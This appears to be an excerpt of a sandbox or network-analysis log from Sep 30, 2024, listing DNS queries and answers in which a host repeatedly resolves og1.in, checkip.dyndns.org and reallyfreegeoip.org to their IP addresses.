                                                                                  Sep 30, 2024 10:12:59.857712030 CEST192.168.2.228.8.8.80xce3bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.868752003 CEST192.168.2.228.8.8.80x13b1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:00.428492069 CEST192.168.2.228.8.8.80xc3c7Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:00.797677040 CEST192.168.2.228.8.8.80x3cb4Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.456545115 CEST192.168.2.228.8.8.80xa773Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.465128899 CEST192.168.2.228.8.8.80xca10Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:03.380299091 CEST192.168.2.228.8.8.80x2e8aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.014008999 CEST192.168.2.228.8.8.80x73b9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.022653103 CEST192.168.2.228.8.8.80x76b2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.169572115 CEST192.168.2.228.8.8.80xc343Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.806227922 CEST192.168.2.228.8.8.80x9ee4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.814817905 CEST192.168.2.228.8.8.80x777dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:06.533123970 CEST192.168.2.228.8.8.80x539Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.227011919 CEST192.168.2.228.8.8.80x9649Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.242930889 CEST192.168.2.228.8.8.80x7837Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.826901913 CEST192.168.2.228.8.8.80xdfa2Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.487097979 CEST192.168.2.228.8.8.80xc9e2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.501348019 CEST192.168.2.228.8.8.80xb24aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:09.193315983 CEST192.168.2.228.8.8.80x7a07Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.758645058 CEST192.168.2.228.8.8.80xc01aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.772866011 CEST192.168.2.228.8.8.80xcd74Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:11.341437101 CEST192.168.2.228.8.8.80x23acStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Sep 30, 2024 10:12:17.329148054 CEST8.8.8.8192.168.2.220xff51No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:17.329148054 CEST8.8.8.8192.168.2.220xff51No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:20.523277044 CEST8.8.8.8192.168.2.220x1de7No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:20.523277044 CEST8.8.8.8192.168.2.220x1de7No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:41.951909065 CEST8.8.8.8192.168.2.220x2970No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:41.951909065 CEST8.8.8.8192.168.2.220x2970No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:45.933367014 CEST8.8.8.8192.168.2.220x3ebNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:45.933367014 CEST8.8.8.8192.168.2.220x3ebNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:45.933367014 CEST8.8.8.8192.168.2.220x3ebNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:45.933367014 CEST8.8.8.8192.168.2.220x3ebNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:45.933367014 CEST8.8.8.8192.168.2.220x3ebNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:45.933367014 CEST8.8.8.8192.168.2.220x3ebNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:46.573544979 CEST8.8.8.8192.168.2.220x2a6dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:46.573544979 CEST8.8.8.8192.168.2.220x2a6dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:46.573544979 CEST8.8.8.8192.168.2.220x2a6dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:46.573544979 CEST8.8.8.8192.168.2.220x2a6dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:46.573544979 CEST8.8.8.8192.168.2.220x2a6dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:46.573544979 CEST8.8.8.8192.168.2.220x2a6dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:47.995135069 CEST8.8.8.8192.168.2.220x5b74No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:47.995135069 CEST8.8.8.8192.168.2.220x5b74No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.180536985 CEST8.8.8.8192.168.2.220xfc6dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.180536985 CEST8.8.8.8192.168.2.220xfc6dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.180536985 CEST8.8.8.8192.168.2.220xfc6dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.180536985 CEST8.8.8.8192.168.2.220xfc6dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.180536985 CEST8.8.8.8192.168.2.220xfc6dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.180536985 CEST8.8.8.8192.168.2.220xfc6dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.194051027 CEST8.8.8.8192.168.2.220x568eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.194051027 CEST8.8.8.8192.168.2.220x568eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.194051027 CEST8.8.8.8192.168.2.220x568eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.194051027 CEST8.8.8.8192.168.2.220x568eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.194051027 CEST8.8.8.8192.168.2.220x568eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.194051027 CEST8.8.8.8192.168.2.220x568eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:51.377881050 CEST8.8.8.8192.168.2.220x5922No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:51.377881050 CEST8.8.8.8192.168.2.220x5922No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.004852057 CEST8.8.8.8192.168.2.220x56c6No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.004852057 CEST8.8.8.8192.168.2.220x56c6No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.004852057 CEST8.8.8.8192.168.2.220x56c6No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.004852057 CEST8.8.8.8192.168.2.220x56c6No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.004852057 CEST8.8.8.8192.168.2.220x56c6No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.004852057 CEST8.8.8.8192.168.2.220x56c6No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.012923002 CEST8.8.8.8192.168.2.220x5b57No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.012923002 CEST8.8.8.8192.168.2.220x5b57No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.012923002 CEST8.8.8.8192.168.2.220x5b57No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.012923002 CEST8.8.8.8192.168.2.220x5b57No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.012923002 CEST8.8.8.8192.168.2.220x5b57No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.012923002 CEST8.8.8.8192.168.2.220x5b57No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.791435957 CEST8.8.8.8192.168.2.220x3791No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.791435957 CEST8.8.8.8192.168.2.220x3791No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.429589987 CEST8.8.8.8192.168.2.220x52c1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.429589987 CEST8.8.8.8192.168.2.220x52c1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.429589987 CEST8.8.8.8192.168.2.220x52c1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.429589987 CEST8.8.8.8192.168.2.220x52c1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.429589987 CEST8.8.8.8192.168.2.220x52c1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.429589987 CEST8.8.8.8192.168.2.220x52c1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.441299915 CEST8.8.8.8192.168.2.220xd0c1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.441299915 CEST8.8.8.8192.168.2.220xd0c1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.441299915 CEST8.8.8.8192.168.2.220xd0c1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.441299915 CEST8.8.8.8192.168.2.220xd0c1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.441299915 CEST8.8.8.8192.168.2.220xd0c1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.441299915 CEST8.8.8.8192.168.2.220xd0c1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:54.222084999 CEST8.8.8.8192.168.2.220x5c0fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:54.222084999 CEST8.8.8.8192.168.2.220x5c0fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.031703949 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.031703949 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.031703949 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.031703949 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.031703949 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.031703949 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.038016081 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.038016081 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.038016081 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.038016081 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.038016081 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.038016081 CEST8.8.8.8192.168.2.220xbaacNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.056915045 CEST8.8.8.8192.168.2.220x28d7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.056915045 CEST8.8.8.8192.168.2.220x28d7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.056915045 CEST8.8.8.8192.168.2.220x28d7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.056915045 CEST8.8.8.8192.168.2.220x28d7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.056915045 CEST8.8.8.8192.168.2.220x28d7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.056915045 CEST8.8.8.8192.168.2.220x28d7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:56.026326895 CEST8.8.8.8192.168.2.220xc9a0No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:56.026326895 CEST8.8.8.8192.168.2.220xc9a0No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.082247019 CEST8.8.8.8192.168.2.220x5182No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.082247019 CEST8.8.8.8192.168.2.220x5182No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.082247019 CEST8.8.8.8192.168.2.220x5182No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.082247019 CEST8.8.8.8192.168.2.220x5182No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.082247019 CEST8.8.8.8192.168.2.220x5182No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.082247019 CEST8.8.8.8192.168.2.220x5182No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.095866919 CEST8.8.8.8192.168.2.220x2167No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.095866919 CEST8.8.8.8192.168.2.220x2167No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.095866919 CEST8.8.8.8192.168.2.220x2167No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.095866919 CEST8.8.8.8192.168.2.220x2167No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.095866919 CEST8.8.8.8192.168.2.220x2167No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.095866919 CEST8.8.8.8192.168.2.220x2167No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.789232016 CEST8.8.8.8192.168.2.220x2827No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.789232016 CEST8.8.8.8192.168.2.220x2827No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.397671938 CEST8.8.8.8192.168.2.220x9c3fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.397671938 CEST8.8.8.8192.168.2.220x9c3fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.397671938 CEST8.8.8.8192.168.2.220x9c3fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.397671938 CEST8.8.8.8192.168.2.220x9c3fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.397671938 CEST8.8.8.8192.168.2.220x9c3fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.397671938 CEST8.8.8.8192.168.2.220x9c3fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.410876989 CEST8.8.8.8192.168.2.220x6978No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.410876989 CEST8.8.8.8192.168.2.220x6978No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.410876989 CEST8.8.8.8192.168.2.220x6978No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.410876989 CEST8.8.8.8192.168.2.220x6978No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.410876989 CEST8.8.8.8192.168.2.220x6978No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.410876989 CEST8.8.8.8192.168.2.220x6978No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:00.439730883 CEST8.8.8.8192.168.2.220xc3c7No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:00.439730883 CEST8.8.8.8192.168.2.220xc3c7No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:00.804769039 CEST8.8.8.8192.168.2.220x3cb4No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:00.804769039 CEST8.8.8.8192.168.2.220x3cb4No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:03.390327930 CEST8.8.8.8192.168.2.220x2e8aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:03.390327930 CEST8.8.8.8192.168.2.220x2e8aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.176615953 CEST8.8.8.8192.168.2.220xc343No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.176615953 CEST8.8.8.8192.168.2.220xc343No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
